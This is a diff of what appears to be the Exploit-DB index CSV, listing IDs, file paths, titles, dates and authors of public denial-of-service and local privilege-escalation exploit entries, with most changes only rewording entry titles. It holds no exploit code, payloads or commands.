+32006,platforms/multiple/dos/32006.txt,"Wireshark 1.0.0 - Multiple Denial of Service Vulnerabilities",2008-06-30,"Noam Rathus",multiple,dos,0 32009,platforms/unix/dos/32009.txt,"QNX Neutrino RTOS 6.3 - 'phgrafx' Local Buffer Overflow",2008-07-01,"Filipe Balestra",unix,dos,0 32018,platforms/linux/dos/32018.txt,"Firefox / Evince / EoG / GIMP - '.SVG' File Processing Denial of Service",2008-07-08,"Kristian Hermansen",linux,dos,0 32019,platforms/linux/dos/32019.txt,"FFmpeg libavformat - 'psxstr.c' STR Data Heap Based Buffer Overflow",2008-07-09,astrange,linux,dos,0 @@ -4473,7 +4473,7 @@ id,file,description,date,author,platform,type,port 35913,platforms/android/dos/35913.txt,"Android WiFi-Direct - Denial of Service",2015-01-26,"Core Security",android,dos,0 35935,platforms/windows/dos/35935.py,"UniPDF 1.1 - Crash (PoC) (SEH)",2015-01-29,bonze,windows,dos,0 35938,platforms/freebsd/dos/35938.txt,"FreeBSD Kernel - Multiple Vulnerabilities",2015-01-29,"Core Security",freebsd,dos,0 -35939,platforms/hardware/dos/35939.txt,"Alice Modem 1111 - 'rulename' Parameter Cross-Site Scripting / Denial of Service",2011-07-12,"Moritz Naumann",hardware,dos,0 +35939,platforms/hardware/dos/35939.txt,"Alice Modem 1111 - 'rulename' Cross-Site Scripting / Denial of Service",2011-07-12,"Moritz Naumann",hardware,dos,0 35951,platforms/linux/dos/35951.py,"Exim ESMTP 4.80 - glibc gethostbyname Denial of Service",2015-01-29,1n3,linux,dos,0 35957,platforms/linux/dos/35957.txt,"Linux Kernel 2.6.26 - Auerswald USB Device Driver Buffer Overflow (PoC)",2009-10-19,"R. Dominguez Veg",linux,dos,0 36007,platforms/multiple/dos/36007.txt,"AzeoTech DaqFactory - Denial of Service",2011-06-24,"Knud Erik Hojgaard",multiple,dos,0 @@ -4943,7 +4943,7 @@ id,file,description,date,author,platform,type,port 39208,platforms/windows/dos/39208.c,"Microsoft Windows - Touch Injection API Local Denial of Service",2014-05-22,"Tavis Ormandy",windows,dos,0 39216,platforms/windows/dos/39216.py,"KeePass Password Safe Classic 1.29 - Crash (PoC)",2016-01-11,"Mohammad Reza Espargham",windows,dos,0 39219,platforms/multiple/dos/39219.txt,"Adobe Flash BlurFilter Processing - Out-of-Bounds Memset",2016-01-11,"Google Security Research",multiple,dos,0 -39220,platforms/windows/dos/39220.txt,"Adobe Flash - Use-After-Free When Rendering Displays From Multiple Scripts (1)",2016-01-11,"Google Security Research",windows,dos,0 +39220,platforms/windows/dos/39220.txt,"Adobe Flash (Multiple Scripts) - Use-After-Free When Rendering Displays (1)",2016-01-11,"Google Security Research",windows,dos,0 39221,platforms/win_x86-64/dos/39221.txt,"Adobe Flash - Use-After-Free When Setting Stage",2016-01-11,"Google Security Research",win_x86-64,dos,0 39229,platforms/linux/dos/39229.cpp,"Grassroots DICOM (GDCM) 2.6.0 and 2.6.1 - ImageRegionReader::ReadIntoBuffer Buffer Overflow",2016-01-12,"Stelios Tsampas",linux,dos,0 39232,platforms/windows/dos/39232.txt,"Microsoft Windows - devenum.dll!DeviceMoniker::Load() Heap Corruption Buffer Underflow (MS16-007)",2016-01-13,"Google Security Research",windows,dos,0 @@ -4969,7 +4969,7 @@ id,file,description,date,author,platform,type,port 39331,platforms/windows/dos/39331.pl,"TFTPD32 / Tftpd64 - Denial of Service",2014-05-14,j0s3h4x0r,windows,dos,0 39353,platforms/windows/dos/39353.txt,"VideoLAN VLC Media Player 2.2.1 - '.mp4' Heap Memory Corruption",2016-01-28,"Francis Provencher",windows,dos,0 39357,platforms/osx/dos/39357.txt,"Apple Mac OSX / iOS - Unsandboxable Kernel Code Exection Due to iokit Double Release in IOKit",2016-01-28,"Google Security Research",osx,dos,0 -39358,platforms/multiple/dos/39358.txt,"Apple Mac OSX / iOS - Multiple Kernel Uninitialized Variable Bugs Leading to Code Execution",2016-01-28,"Google Security Research",multiple,dos,0 +39358,platforms/multiple/dos/39358.txt,"Apple Mac OSX / iOS - Multiple Kernel Uninitialized Variable Bugs Leading to Code Execution Vulnerabilities",2016-01-28,"Google Security Research",multiple,dos,0 39359,platforms/ios/dos/39359.txt,"iOS Kernel - AppleOscarGyro Use-After-Free",2016-01-28,"Google Security Research",ios,dos,0 39360,platforms/ios/dos/39360.txt,"iOS Kernel - AppleOscarAccelerometer Use-After-Free",2016-01-28,"Google Security Research",ios,dos,0 39361,platforms/ios/dos/39361.txt,"iOS Kernel - AppleOscarCompass Use-After-Free",2016-01-28,"Google Security Research",ios,dos,0 @@ -5118,7 +5118,7 @@ id,file,description,date,author,platform,type,port 39774,platforms/windows/dos/39774.html,"Baidu Spark Browser 43.23.1000.476 - Address Bar URL Spoofing",2016-05-05,"liu zhu",windows,dos,0 39775,platforms/windows/dos/39775.py,"RPCScan 2.03 - Hostname/IP Field Crash (PoC)",2016-05-06,"Irving Aguilar",windows,dos,0 39776,platforms/windows/dos/39776.py,"CIScan 1.00 - Hostname/IP Field Crash (PoC)",2016-05-06,"Irving Aguilar",windows,dos,0 -39778,platforms/windows/dos/39778.txt,"Adobe Flash - Use-After-Free When Rendering Displays From Multiple Scripts (2)",2016-05-06,"Google Security Research",windows,dos,0 +39778,platforms/windows/dos/39778.txt,"Adobe Flash (Multiple Scripts) - Use-After-Free When Rendering Displays (2)",2016-05-06,"Google Security Research",windows,dos,0 39779,platforms/windows/dos/39779.txt,"Adobe Flash - MovieClip.duplicateMovieClip Use-After-Free",2016-05-06,"Google Security Research",windows,dos,0 39782,platforms/windows/dos/39782.py,"i.FTP 2.21 - Host Address / URL Field (SEH)",2016-05-09,"Tantaryu MING",windows,dos,0 39785,platforms/windows/dos/39785.cs,"ASUS Memory Mapping Driver (ASMMAP/ASMMAP64) - Physical Memory Read/Write",2016-05-09,slipstream,windows,dos,0 @@ -5141,8 +5141,8 @@ id,file,description,date,author,platform,type,port 39829,platforms/multiple/dos/39829.txt,"Adobe Flash - Type Confusion in FileReference Constructor",2016-05-17,"Google Security Research",multiple,dos,0 39830,platforms/multiple/dos/39830.txt,"Adobe Flash - addProperty Use-After-Free",2016-05-17,"Google Security Research",multiple,dos,0 39831,platforms/multiple/dos/39831.txt,"Adobe Flash - SetNative Use-After-Free",2016-05-17,"Google Security Research",multiple,dos,0 -39832,platforms/windows/dos/39832.txt,"Microsoft Windows - 'gdi32.dll' Multiple Issues in the EMF CREATECOLORSPACEW Record Handling (MS16-055)",2016-05-17,"Google Security Research",windows,dos,0 -39833,platforms/windows/dos/39833.txt,"Microsoft Windows - 'gdi32.dll' Multiple Issues in the EMF COMMENT_MULTIFORMATS Record Handling (MS16-055)",2016-05-17,"Google Security Research",windows,dos,0 +39832,platforms/windows/dos/39832.txt,"Microsoft Windows - 'gdi32.dll' Multiple Issues 'EMF CREATECOLORSPACEW' Record Handling (MS16-055)",2016-05-17,"Google Security Research",windows,dos,0 +39833,platforms/windows/dos/39833.txt,"Microsoft Windows - 'gdi32.dll' Multiple Issues 'EMF COMMENT_MULTIFORMATS' Record Handling (MS16-055)",2016-05-17,"Google Security Research",windows,dos,0 39834,platforms/multiple/dos/39834.txt,"Microsoft Windows - 'gdi32.dll' Heap Based Buffer Overflow in ExtEscape() Triggerable via EMR_EXTESCAPE EMF Record (MS16-055)",2016-05-17,"Google Security Research",multiple,dos,0 39835,platforms/multiple/dos/39835.txt,"Symantec/Norton AntiVirus - ASPack Remote Heap/Pool Memory Corruption",2016-05-17,"Google Security Research",multiple,dos,0 39842,platforms/linux/dos/39842.txt,"4digits 1.1.4 - Local Buffer Overflow",2016-05-19,N_A,linux,dos,0 @@ -5187,7 +5187,7 @@ id,file,description,date,author,platform,type,port 39993,platforms/win_x86/dos/39993.txt,"Microsoft Windows - Custom Font Disable Policy Bypass",2016-06-21,"Google Security Research",win_x86,dos,0 39994,platforms/windows/dos/39994.html,"Microsoft Internet Explorer 11 - Garbage Collector Attribute Type Confusion (MS16-063)",2016-06-21,Skylined,windows,dos,0 40014,platforms/hardware/dos/40014.txt,"Magnet Networks Tesley CPVA 642 Router - Weak WPA-PSK Passphrase Algorithm",2016-06-27,"Matt O'Connor",hardware,dos,0 -40031,platforms/multiple/dos/40031.txt,"Symantec AntiVirus - Multiple Remote Memory Corruption Unpacking RAR",2016-06-29,"Google Security Research",multiple,dos,0 +40031,platforms/multiple/dos/40031.txt,"Symantec AntiVirus - Unpacking RAR Multiple Remote Memory Corruptions",2016-06-29,"Google Security Research",multiple,dos,0 40032,platforms/multiple/dos/40032.txt,"Symantec AntiVirus - 'dec2lha Library' Remote Stack Buffer Overflow",2016-06-29,"Google Security Research",multiple,dos,0 40034,platforms/multiple/dos/40034.txt,"Symantec AntiVirus - Heap Overflow Modifying MIME Messages",2016-06-29,"Google Security Research",multiple,dos,0 40035,platforms/multiple/dos/40035.txt,"Symantec AntiVirus - Integer Overflow in TNEF Decoder",2016-06-29,"Google Security Research",multiple,dos,0 @@ -5714,6 +5714,7 @@ id,file,description,date,author,platform,type,port 43000,platforms/windows/dos/43000.js,"Microsoft Edge Chakra JIT - 'RegexHelper::StringReplace' Must Call the Callback Function with Updating ImplicitCallFlags",2017-10-17,"Google Security Research",windows,dos,0 43001,platforms/windows/dos/43001.cpp,"Microsoft Windows - 'nt!NtQueryObject (ObjectNameInformation)' Kernel Pool Memory Disclosure",2017-10-17,"Google Security Research",windows,dos,0 43010,platforms/linux/dos/43010.c,"Linux Kernel - 'AF_PACKET' Use-After-Free",2017-10-17,SecuriTeam,linux,dos,0 +43014,platforms/linux/dos/43014.txt,"Xen - Unbounded Recursion in Pagetable De-typing",2017-10-18,"Google Security Research",linux,dos,0 3,platforms/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0 4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0 12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0 @@ -5803,7 +5804,7 @@ id,file,description,date,author,platform,type,port 317,platforms/linux/local/317.txt,"Resolv+ (RESOLV_HOST_CONF) - Linux Library Local Exploit",1996-01-01,"Jared Mauch",linux,local,0 319,platforms/linux/local/319.c,"sudo.bin - NLSPATH Privilege Escalation",1996-02-13,_Phantom_,linux,local,0 320,platforms/linux/local/320.pl,"suid_perl 5.001 - Exploit",1996-06-01,"Jon Lewis",linux,local,0 -321,platforms/multiple/local/321.c,"BSD / Linux - 'umount' Privilege Escalation",1996-08-13,bloodmask,multiple,local,0 +321,platforms/multiple/local/321.c,"BSD / Linux - 'umount' Privilege Escalation",1996-08-13,bloodmask,multiple,local,0 322,platforms/linux/local/322.c,"Xt Library - Privilege Escalation",1996-08-24,"b0z0 bra1n",linux,local,0 325,platforms/linux/local/325.c,"BSD / Linux - 'lpr' Privilege Escalation",1996-10-25,"Vadim Kolontsov",linux,local,0 328,platforms/solaris/local/328.c,"Solaris 2.4 - '/bin/fdformat' Local Buffer Overflow",1997-03-23,"Cristian Schipor",solaris,local,0 @@ -6047,7 +6048,7 @@ id,file,description,date,author,platform,type,port 2065,platforms/windows/local/2065.c,"Cheese Tracker 0.9.9 - Local Buffer Overflow (PoC)",2006-07-23,"Luigi Auriemma",windows,local,0 2067,platforms/solaris/local/2067.c,"Solaris 10 - 'sysinfo()' Local Kernel Memory Disclosure (1)",2006-07-24,prdelka,solaris,local,0 2091,platforms/windows/local/2091.cpp,"Microsoft PowerPoint 2003 SP2 - Local Code Execution (French)",2006-07-30,NSRocket,windows,local,0 -2094,platforms/windows/local/2094.c,"Open Cubic Player 2.6.0pre6/0.1.10_rc5 - Multiple Buffer Overflow",2006-07-31,"Luigi Auriemma",windows,local,0 +2094,platforms/windows/local/2094.c,"Open Cubic Player 2.6.0pre6/0.1.10_rc5 - Multiple Buffer Overflows",2006-07-31,"Luigi Auriemma",windows,local,0 2106,platforms/osx/local/2106.pl,"Apple Mac OSX 10.4.7 (x86) - 'fetchmail' Privilege Escalation",2006-08-01,"Kevin Finisterre",osx,local,0 2107,platforms/osx/local/2107.pl,"Apple Mac OSX 10.4.7 (PPC) - 'fetchmail' Privilege Escalation",2006-08-01,"Kevin Finisterre",osx,local,0 2108,platforms/osx/local/2108.sh,"Apple Mac OSX 10.4.7 - fetchmail Privilege Escalation",2006-08-01,"Kevin Finisterre",osx,local,0 @@ -6113,7 +6114,7 @@ id,file,description,date,author,platform,type,port 3181,platforms/osx/local/3181.rb,"Apple Mac OSX 10.4.8 - 'UserNotificationCenter' Privilege Escalation",2007-01-23,MoAB,osx,local,0 3213,platforms/linux/local/3213.c,"Trend Micro VirusWall 3.81 - (vscan/VSAPI) Local Buffer Overflow",2007-01-28,"Sebastian Wolfgarten",linux,local,0 3219,platforms/osx/local/3219.rb,"Apple Mac OSX 10.4.8 (8L2127) - crashdump Privilege Escalation",2007-01-29,MoAB,osx,local,0 -3220,platforms/windows/local/3220.c,"Multiple Printer Providers (spooler service) - Privilege Escalation",2007-01-29,"Andres Tarasco",windows,local,0 +3220,platforms/windows/local/3220.c,"Multiple Printer Providers (Spooler Service) - Privilege Escalation",2007-01-29,"Andres Tarasco",windows,local,0 3260,platforms/windows/local/3260.txt,"Microsoft Word 2000 - Unspecified Code Execution",2007-02-03,xCuter,windows,local,0 3273,platforms/tru64/local/3273.ksh,"HP Tru64 Alpha OSF1 5.1 - (ps) Information Leak Exploit",2007-02-06,bunker,tru64,local,0 3330,platforms/linux/local/3330.pl,"ProFTPd 1.3.0/1.3.0a - 'mod_ctrls support' Local Buffer Overflow (1)",2007-02-18,Revenge,linux,local,0 @@ -6675,7 +6676,7 @@ id,file,description,date,author,platform,type,port 10396,platforms/linux/local/10396.pl,"Mozilla Codesighs - Memory Corruption (PoC)",2009-12-12,"Jeremy Brown",linux,local,0 10423,platforms/windows/local/10423.pl,"RM Downloader 3.0.2.1 - '.m3u' Stack Overflow",2009-12-14,"Vinod Sharma",windows,local,0 10475,platforms/windows/local/10475.txt,"QuickHeal AntiVirus 2010 - Privilege Escalation",2009-12-16,"Francis Provencher",windows,local,0 -10484,platforms/windows/local/10484.txt,"Kaspersky Lab - Multiple Products Privilege Escalation",2009-12-16,"Maxim A. Kulakov",windows,local,0 +10484,platforms/windows/local/10484.txt,"Kaspersky Lab (Multiple Products) - Privilege Escalation",2009-12-16,"Maxim A. Kulakov",windows,local,0 10487,platforms/linux/local/10487.txt,"VideoCache 1.9.2 - 'vccleaner' Privilege Escalation",2009-12-16,"Dominick LaTrappe",linux,local,0 10544,platforms/multiple/local/10544.html,"Mozilla Firefox - Location Bar Spoofing",2009-12-18,"Jordi Chancel",multiple,local,0 10556,platforms/windows/local/10556.c,"PlayMeNow 7.3/7.4 - '.M3U' Playlist File Buffer",2009-12-19,Gr33nG0bL1n,windows,local,0 @@ -7055,7 +7056,7 @@ id,file,description,date,author,platform,type,port 16141,platforms/windows/local/16141.py,"xRadio 0.95b - '.xrl' Local Buffer Overflow (SEH)",2011-02-09,b0telh0,windows,local,0 16153,platforms/windows/local/16153.py,"MoviePlay 4.82 - '.lst' Buffer Overflow",2011-02-11,sickness,windows,local,0 16162,platforms/windows/local/16162.pl,"CuteZip 2.1 - Buffer Overflow",2011-02-12,"C4SS!0 G0M3S",windows,local,0 -16169,platforms/windows/local/16169.py,"Oracle 10/11g - 'exp.exe file' Parameter Local Buffer Overflow (PoC)",2011-02-15,mr_me,windows,local,0 +16169,platforms/windows/local/16169.py,"Oracle 10/11g - 'exp.exe?file' Local Buffer Overflow (PoC)",2011-02-15,mr_me,windows,local,0 16173,platforms/windows/local/16173.py,"AutoPlay 1.33 (autoplay.ini) - Local Buffer Overflow (SEH)",2011-02-15,badc0re,windows,local,0 16253,platforms/windows/local/16253.py,"Elecard AVC_HD/MPEG Player 5.7 - Buffer Overflow",2011-02-27,sickness,windows,local,0 16307,platforms/multiple/local/16307.rb,"PeaZIP 2.6.1 - Zip Processing Command Injection (Metasploit)",2010-09-20,Metasploit,multiple,local,0 @@ -7207,7 +7208,7 @@ id,file,description,date,author,platform,type,port 17647,platforms/windows/local/17647.rb,"A-PDF All to MP3 2.3.0 - Universal DEP Bypass",2011-08-10,"C4SS!0 G0M3S",windows,local,0 17654,platforms/windows/local/17654.py,"MP3 CD Converter Professional 5.3.0 - Universal DEP Bypass",2011-08-11,"C4SS!0 G0M3S",windows,local,0 17665,platforms/windows/local/17665.pl,"D.R. Software Audio Converter 8.1 - DEP Bypass",2011-08-13,"C4SS!0 G0M3S",windows,local,0 -17715,platforms/windows/local/17715.html,"F-Secure Multiple Products - ActiveX Overwrite (SEH) (Heap Spray)",2011-08-24,41.w4r10r,windows,local,0 +17715,platforms/windows/local/17715.html,"F-Secure (Multiple Products) - ActiveX Overwrite (SEH) (Heap Spray)",2011-08-24,41.w4r10r,windows,local,0 17727,platforms/windows/local/17727.txt,"Free MP3 CD Ripper 1.1 - Local Buffer Overflow",2011-08-27,X-h4ck,windows,local,0 17732,platforms/windows/local/17732.py,"Free MP3 CD Ripper 1.1 - DEP Bypass",2011-08-27,"C4SS!0 G0M3S",windows,local,0 17735,platforms/windows/local/17735.pl,"Yahoo! player 1.5 - '.m3u' Universal Buffer Overflow (SEH)",2011-08-28,"D3r K0n!G",windows,local,0 @@ -7235,7 +7236,7 @@ id,file,description,date,author,platform,type,port 17932,platforms/linux/local/17932.c,"PolicyKit polkit-1 < 0.101 - Privilege Escalation",2011-10-05,zx2c4,linux,local,0 17939,platforms/windows/local/17939.py,"BlazeVideo HDTV Player 6.6 Professional - Universal ASLR + DEP Bypass",2011-10-07,modpr0be,windows,local,0 17942,platforms/linux/local/17942.c,"pkexec - Race Condition Privilege Escalation",2011-10-08,xi4oyu,linux,local,0 -17966,platforms/windows/local/17966.rb,"ACDSee FotoSlate - '.PLP' File 'id' Parameter Overflow (Metasploit)",2011-10-10,Metasploit,windows,local,0 +17966,platforms/windows/local/17966.rb,"ACDSee FotoSlate - '.PLP' File 'id' Overflow (Metasploit)",2011-10-10,Metasploit,windows,local,0 17967,platforms/windows/local/17967.rb,"TugZip 3.5 Archiver - '.ZIP' File Parsing Buffer Overflow (Metasploit)",2011-10-11,Metasploit,windows,local,0 17985,platforms/windows/local/17985.rb,"Real Networks Netzip Classic 7.5.1 86 - File Parsing Buffer Overflow (Metasploit)",2011-10-16,Metasploit,windows,local,0 18040,platforms/linux/local/18040.c,"Xorg 1.4 < 1.11.2 - File Permission Change (PoC)",2011-10-28,vladz,linux,local,0 @@ -7877,7 +7878,7 @@ id,file,description,date,author,platform,type,port 21107,platforms/unix/local/21107.sh,"Digital Unix 4.0 - MSGCHK MH_PROFILE Symbolic Link",2001-09-10,seo,unix,local,0 21108,platforms/unix/local/21108.txt,"SpeechD 0.1/0.2 - Privileged Command Execution",2001-09-11,"Tyler Spivey",unix,local,0 21114,platforms/freebsd/local/21114.txt,"FreeBSD 4.3/4.4 - Login Capabilities Privileged File Reading",2001-09-17,"Przemyslaw Frasunek",freebsd,local,0 -21117,platforms/multiple/local/21117.txt,"Progress Database 8.3/9.1 - Multiple Buffer Overflow",2001-10-05,kf,multiple,local,0 +21117,platforms/multiple/local/21117.txt,"Progress Database 8.3/9.1 - Multiple Buffer Overflows",2001-10-05,kf,multiple,local,0 21120,platforms/unix/local/21120.c,"Snes9x 1.3 - Local Buffer Overflow",2001-10-16,"Niels Heinen",unix,local,0 21124,platforms/linux/local/21124.txt,"Linux Kernel 2.2/2.4 - Ptrace/Setuid Exec Privilege Escalation",2001-10-18,"Rafal Wojtczuk",linux,local,0 21130,platforms/windows/local/21130.c,"Microsoft Windows NT 3/4.0 - CSRSS Memory Access Violation",2001-10-26,"Michael Wojcik",windows,local,0 @@ -8063,7 +8064,7 @@ id,file,description,date,author,platform,type,port 22325,platforms/unix/local/22325.c,"File 3.x - Local Stack Overflow Code Execution (2)",2003-03-04,lem0nxx,unix,local,0 22326,platforms/linux/local/22326.c,"File 3.x - Utility Local Memory Allocation",2003-03-06,CrZ,linux,local,0 22329,platforms/windows/local/22329.c,"CoffeeCup Software Password Wizard 4.0 - HTML Source Password Retrieval",2003-03-03,THR,windows,local,0 -22335,platforms/unix/local/22335.pl,"Tower Toppler 0.99.1 - 'Display' Parameter Local Buffer Overflow",2002-03-02,"Knud Erik Hojgaard",unix,local,0 +22335,platforms/unix/local/22335.pl,"Tower Toppler 0.99.1 - 'Display' Local Buffer Overflow",2002-03-02,"Knud Erik Hojgaard",unix,local,0 22340,platforms/linux/local/22340.txt,"MySQL 3.23.x - 'mysqld' Privilege Escalation",2003-03-08,bugsman@libero.it,linux,local,0 22344,platforms/linux/local/22344.txt,"Man Program 1.5 - Unsafe Return Value Command Execution",2003-03-11,"Jack Lloyd",linux,local,0 22354,platforms/windows/local/22354.c,"Microsoft Windows Server 2000 - Help Facility '.CNT' File :Link Buffer Overflow",2003-03-09,s0h,windows,local,0 @@ -8135,10 +8136,10 @@ id,file,description,date,author,platform,type,port 23037,platforms/windows/local/23037.txt,"DWebPro 3.4.1 - Http.ini Plaintext Password Storage",2003-08-18,rUgg1n3,windows,local,0 22882,platforms/windows/local/22882.c,"Microsoft Windows Server 2000 - CreateFile API Named Pipe Privilege Escalation (1)",2003-07-08,Maceo,windows,local,0 22883,platforms/windows/local/22883.c,"Microsoft Windows Server 2000 - CreateFile API Named Pipe Privilege Escalation (2)",2003-07-08,Maceo,windows,local,0 -22884,platforms/linux/local/22884.c,"Tower Toppler 0.96 - 'HOME Environment' Parameter Local Buffer Overflow",2003-07-08,FBHowns,linux,local,0 +22884,platforms/linux/local/22884.c,"Tower Toppler 0.96 - 'HOME Environment' Local Buffer Overflow",2003-07-08,FBHowns,linux,local,0 22911,platforms/php/local/22911.php,"PHP 4.3.x - Undefined Safe_Mode_Include_Dir Safemode Bypass",2003-07-16,"Michal Krause",php,local,0 22912,platforms/unix/local/22912.c,"IBM UniVerse 10.0.0.9 - uvadmsh Privilege Escalation",2003-07-16,kf,unix,local,0 -22943,platforms/linux/local/22943.c,"Top 1.x/2.0 - 'Home Environment' Parameter Local Buffer Overflow",2003-07-22,UHAGr,linux,local,0 +22943,platforms/linux/local/22943.c,"Top 1.x/2.0 - 'HOME Environment' Local Buffer Overflow",2003-07-22,UHAGr,linux,local,0 22946,platforms/windows/local/22946.txt,"MySQL AB ODBC Driver 3.51 - Plain Text Password",2003-07-22,hanez,windows,local,0 22965,platforms/linux/local/22965.c,"XBlast 2.6.1 - 'HOME Environment' Buffer Overflow",2003-07-28,c0wboy,linux,local,0 22923,platforms/unix/local/22923.c,"Tolis Group BRU 17.0 - Privilege Escalation (1)",2003-07-16,DVDMAN,unix,local,0 @@ -8392,7 +8393,7 @@ id,file,description,date,author,platform,type,port 27297,platforms/linux/local/27297.c,"Linux Kernel 3.7.6 (RedHat x86/x64) - 'MSR' Driver Privilege Escalation",2013-08-02,spender,linux,local,0 27316,platforms/windows/local/27316.py,"Easy LAN Folder Share 3.2.0.100 - Buffer Overflow (SEH)",2013-08-03,sagi-,windows,local,0 27334,platforms/php/local/27334.txt,"PHP 4.x/5.0/5.1 with Sendmail Mail Function - 'additional_parameters' Argument Arbitrary File Creation",2006-02-28,ced.clerget@free.fr,php,local,0 -27335,platforms/php/local/27335.txt,"PHP 4.x/5.0/5.1 - 'mb_send_mail()' Parameter Restriction Bypass",2006-02-28,ced.clerget@free.fr,php,local,0 +27335,platforms/php/local/27335.txt,"PHP 4.x/5.0/5.1 - 'mb_send_mail()' Restriction Bypass",2006-02-28,ced.clerget@free.fr,php,local,0 40764,platforms/windows/local/40764.cs,"Microsoft Windows - VHDMP ZwDeleteFile Arbitrary File Deletion Privilege Escalation (MS16-138)",2016-11-15,"Google Security Research",windows,local,0 40763,platforms/windows/local/40763.cs,"Microsoft Windows - VHDMP Arbitrary File Creation Privilege Escalation (MS16-138)",2016-11-15,"Google Security Research",windows,local,0 27461,platforms/linux/local/27461.c,"Linux Kernel 2.4.x/2.5.x/2.6.x - Sockaddr_In.Sin_Zero Kernel Memory Disclosure Vulnerabilities",2006-03-23,"Pavel Kankovsky",linux,local,0 @@ -8446,7 +8447,7 @@ id,file,description,date,author,platform,type,port 29263,platforms/windows/local/29263.pl,"BlazeDVD 6.2 - '.plf' Buffer Overflow (SEH)",2013-10-28,"Mike Czumak",windows,local,0 29309,platforms/windows/local/29309.pl,"AudioCoder 0.8.22 - '.m3u' Buffer Overflow (SEH)",2013-10-30,"Mike Czumak",windows,local,0 29374,platforms/windows/local/29374.txt,"Kerio Personal Firewall 4.3 - 'IPHLPAPI.dll' Privilege Escalation",2007-01-01,"Matousec Transparent security",windows,local,0 -29403,platforms/windows/local/29403.txt,"HP Multiple Products PML Driver HPZ12 - Privilege Escalation",2007-01-08,Sowhat,windows,local,0 +29403,platforms/windows/local/29403.txt,"HP (Multiple Products) - PML Driver HPZ12 Privilege Escalation",2007-01-08,Sowhat,windows,local,0 29446,platforms/linux/local/29446.c,"Grsecurity Kernel PaX - Privilege Escalation",2006-12-18,anonymous,linux,local,0 29465,platforms/windows/local/29465.txt,"Outpost Firewall PRO 4.0 - Privilege Escalation",2007-01-15,"Matousec Transparent security",windows,local,0 29467,platforms/linux/local/29467.c,"Rixstep Undercover - Privilege Escalation",2007-01-15,"Rixstep Pwned",linux,local,0 @@ -8474,7 +8475,7 @@ id,file,description,date,author,platform,type,port 30183,platforms/multiple/local/30183.txt,"Air Gallery 1.0 Air Photo Browser - Multiple Vulnerabilities",2013-12-10,Vulnerability-Lab,multiple,local,0 29799,platforms/windows/local/29799.pl,"Total Video Player 1.3.1 (Settings.ini) - Buffer Overflow (SEH)",2013-11-24,"Mike Czumak",windows,local,0 29801,platforms/php/local/29801.php,"PHP 5.2.1 - 'Session.Save_Path()' TMPDIR open_basedir Restriction Bypass",2007-03-28,"Stefan Esser",php,local,0 -29804,platforms/php/local/29804.php,"PHP 5.2.1 - Multiple functions Reference Parameter Information Disclosure",2007-03-29,"Stefan Esser",php,local,0 +29804,platforms/php/local/29804.php,"PHP 5.2.1 - Multiple functions 'Reference' Information Disclosures",2007-03-29,"Stefan Esser",php,local,0 29822,platforms/linux/local/29822.c,"Man Command - -H Flag Local Buffer Overflow",2007-04-06,"Daniel Roethlisberger",linux,local,0 29881,platforms/windows/local/29881.txt,"Adobe Acrobat Reader - ASLR + DEP Bypass with Sandbox Bypass",2013-11-28,"w3bd3vil and abh1sek",windows,local,0 29922,platforms/windows/local/29922.py,"Kingsoft Office Writer 2012 8.1.0.3385 - '.wps' Buffer Overflow (SEH)",2013-11-30,"Julien Ahrens",windows,local,0 @@ -8487,7 +8488,7 @@ id,file,description,date,author,platform,type,port 30280,platforms/linux/local/30280.txt,"GFax 0.7.6 - Temporary Files Local Arbitrary Command Execution",2007-07-05,"Steve Kemp",linux,local,0 30295,platforms/multiple/local/30295.sql,"Oracle Database - SQL Compiler Views Unauthorized Manipulation",2007-07-12,bunker,multiple,local,0 30393,platforms/win_x86-64/local/30393.rb,"Nvidia (nvsvc) Display Driver Service - Privilege Escalation (Metasploit)",2013-12-17,Metasploit,win_x86-64,local,0 -30392,platforms/windows/local/30392.rb,"Microsoft Windows - 'ndproxy.sys' Privilege Escalation (Metasploit)",2013-12-17,Metasploit,windows,local,0 +30392,platforms/windows/local/30392.rb,"Microsoft Windows - 'ndproxy.sys' Privilege Escalation (Metasploit)",2013-12-17,Metasploit,windows,local,0 30336,platforms/windows/local/30336.py,"VUPlayer 2.49 - '.m3u' File Universal Buffer Overflow (DEP Bypass) (2)",2013-12-16,"Morteza Hashemi",windows,local,0 30802,platforms/windows/local/30802.c,"VMware Tools 3.1 - 'HGFS.Sys' Privilege Escalation",2007-11-24,SoBeIt,windows,local,0 30374,platforms/windows/local/30374.txt,"QuickHeal AntiVirus 7.0.0.1 - Stack Overflow",2013-12-17,"Arash Allebrahim",windows,local,0 @@ -8500,7 +8501,7 @@ id,file,description,date,author,platform,type,port 30477,platforms/windows/local/30477.txt,"Huawei Technologies du Mobile Broadband 16.0 - Privilege Escalation",2013-12-24,LiquidWorm,windows,local,0 30484,platforms/bsd/local/30484.c,"Systrace - Multiple System Call Wrappers Concurrency Vulnerabilities",2007-08-09,"Robert N. M. Watson",bsd,local,0 30503,platforms/linux/local/30503.txt,"BlueCat Networks Adonis 5.0.2.8 - CLI Privilege Escalation",2007-08-16,forloop,linux,local,0 -30546,platforms/windows/local/30546.txt,"Multiple Microworld eScan Products - Privilege Escalation",2007-08-30,"Edi Strosar",windows,local,0 +30546,platforms/windows/local/30546.txt,"Microworld eScan (Multiple Products) - Privilege Escalation",2007-08-30,"Edi Strosar",windows,local,0 30970,platforms/multiple/local/30970.txt,"White_Dune 0.29beta791 - Multiple Local Code Execution Vulnerabilities",2008-01-02,"Luigi Auriemma",multiple,local,0 30604,platforms/linux/local/30604.c,"Linux Kernel 2.6.x - Ptrace Privilege Escalation",2007-09-21,"Wojciech Purczynski",linux,local,0 30605,platforms/linux/local/30605.c,"Linux Kernel 2.6.x - ALSA snd-page-alloc Local Proc File Information Disclosure",2007-09-21,Karimo_DM,linux,local,0 @@ -8563,7 +8564,7 @@ id,file,description,date,author,platform,type,port 32737,platforms/windows/local/32737.pl,"BlazeDVD Pro Player 6.1 - Stack Based Buffer Overflow Jump ESP",2014-04-08,"Deepak Rathore",windows,local,0 32751,platforms/lin_x86-64/local/32751.c,"Systrace 1.x (x64) - Aware Linux Kernel Privilege Escalation",2009-01-23,"Chris Evans",lin_x86-64,local,0 32752,platforms/windows/local/32752.rb,"WinRAR - Filename Spoofing (Metasploit)",2014-04-08,Metasploit,windows,local,0 